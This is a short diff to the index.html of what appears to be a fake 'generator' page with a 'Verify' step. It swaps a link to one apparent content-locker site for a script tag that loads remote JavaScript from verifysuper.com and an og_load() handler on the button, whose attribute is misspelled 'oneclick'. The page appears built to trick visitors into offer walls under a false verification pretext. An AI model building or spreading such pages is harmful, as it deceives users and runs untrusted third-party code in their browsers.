--- a/index.html
+++ b/index.html
@@ -201,8 +201,10 @@ to your account.</p>
 <div class="generator-button-dot b-b-r"></div>
 <div class="generator-button-dot b-b-l"></div>
 <div class="generator-button-overlay"></div>
-<a href="https://www.locked3.com/cl/i/lepej" id="first-step-button-verify" class="generator-button first-step-button"><span class="generator-button-text">Verify</span></a>
+<a  oneclick="og_load()" id="first-step-button-verify" class="generator-button first-step-button"><span class="generator-button-text">Verify</span></a>
 </div>
+        	<script type="text/javascript" id="ogjs" src="https://verifysuper.com/cl/js/42p9w5"></script>
+
 </div>
 <div id="fountainG">
 <div id="fountainG_1" class="fountainG"></div>
